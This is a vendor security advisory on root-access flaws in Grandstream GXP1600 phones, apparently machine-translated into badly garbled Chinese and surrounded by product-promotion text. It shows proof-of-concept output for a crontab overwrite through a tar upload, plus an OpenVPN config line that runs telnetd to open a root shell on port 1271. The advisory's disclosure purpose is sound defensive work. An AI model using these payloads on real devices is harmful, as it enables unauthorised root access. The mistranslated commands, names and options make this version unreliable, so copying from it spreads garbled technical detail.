脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Grandstream GXP1600系列多个问题

至关重要的

剧情简介

虽然调查Grandstream GXP1625,站得住脚的发现几个漏洞,允许经过身份验证的远程攻击者获得根访问。

cve - 2020 - 5738:验证通过焦油上传远端控制设备

身份验证的远程攻击者可以滥用的端点/目录/ upload_vpntar实现任意代码执行upload_vpntar打开到接受一个tar文件/var/user/openvpn/。要删除的操作将允许符号链接/var/user/openvpn。攻击者可以将通过符号链接解压到磁盘上的任何地方可写。具体来说,/var/spool/cron/crontabs/目录是可写的。通过覆盖根crontab文件,攻击者可以执行任意脚本,因此实现根访问。

下面是我们的概念证明的输出,您可以发现GitHub。PoC将上传一个tar文件将覆盖根cron和执行该脚本/var/user/openvpn/attack_script1270年启用一个后门。请注意,可能需要一分钟定时任务的处理。

albinolobster@ubuntu: ~ / poc / grandstream gxp1600 telnet 192.168.2.104 1270美元在192.168.2.104……telnet:无法连接到远程主机连接拒绝albinolobster@ubuntu: ~ / poc / grandstream gxp1600美元python3 upload_rce。py - 192.168.2.104 - p 80——通过labpass1[+]通过http://192.168.2.104:80登录/目录/ dologin[+]登录。席德:197489727 e1586805795[+]上传焦油[+]成功!albinolobster@ubuntu: ~ / poc / grandstream gxp1600 telnet 192.168.2.104 1270美元在192.168.2.104……telnet:无法连接到远程主机连接拒绝albinolobster@ubuntu: ~ / poc / grandstream gxp1600 telnet 192.168.2.104 1270美元在192.168.2.104……连接到192.168.2.104。转义字符“^]”。# uname - Linux gxp1625_000b82af91ab 3.4.20-rt31-dvf-v1.3.1.2-rc1 # 5抢占星期五2019年10月11日11:56:43 PDT armv5tejl GNU / Linux根# #显示本用户信息

通过OpenVPN cve - 2020 - 5739:身份验证的远端控制设备配置文件

身份验证的远程攻击者可以滥用OpenVPN设置实现作为根用户执行任意代码。的附加选项字段允许用户添加任意OpenVPN配置设置配置文件。如果一个用户添加以下:

script-security 2;”/ bin /灰- c telnetd - l /bin/sh - p 1271”;

然后,当VPN连接已经建立,OpenVPN将执行了脚本从而打开一个根后门在端口1271上。如果你不介意的话有点自我推销,我建议这种攻击在博客标题,反向壳从一个OpenVPN配置文件几年前。

解决方案

在撰写本文时,Grandstream尚未发布一个补丁。

披露时间表

01/10/2020——找不到安全接触,在Twitter上站得住脚的Grandstream联系。还伸出布兰登Scarvell希望他可能知道一些。
01/10/2020布兰登-帮助回答。
通过Grandstream 01/11/2020——站得住脚的要求安全联系帮助台(20200111084200票)。
01/12/2020——Grandstream要求澄清。
01/12/2020——站得住脚的重申渴望一个安全电子邮件联系。
01/12/2020——Grandstream表示他们将诊断问题通过票。
01/12/2020——站得住脚的再次要求最终澄清安全联系。
通过帮助台01/12/2020——Grandstream提示站得住脚的披露。
01/12/2020——站得住脚的揭示。90天4月13日,2020年。
01/12/2020——Grandstream表示“错误已经打开。”
01/12/2020——Grandstream要求利用脚本。
01/12/2020——站得住脚的指出其已经连接到票。
02/17/2020——Grandstream发送工程建设。
02/17/2020——站得住脚的证实了修复工作。
在Grandstream 03/20/2020——站得住脚的检查。
03/20/2020——Grandstream表示没有埃塔释放。
03/20/2020——站得住脚的提醒Grandstream 4月13日披露的最后期限。
03/20/2020——Grandstream承认。
04/02/2020——Grandstream发送另一个测试构建。
04/02/2020——站得住脚的问为什么第二个构建已经发送。
这是最后的构建04/03/2020——Grandstream状态。
04/06/2020——站得住脚的说它看起来不错。
04/06/2020——Grandstream州固件应该发表“下周或本月底……”

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2020 - 22所示
信贷

雅各布·贝恩斯

CVSSv2基地/时间的分数
9.0/8.5
CVSSv2向量
AV: N /交流:L /非盟:S / C: C / I: C / A: C
受影响的产品
Grandstream 16 xx 1.0.4.152
风险因素
至关重要的

咨询时间

2020年4月13日—初始释放

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map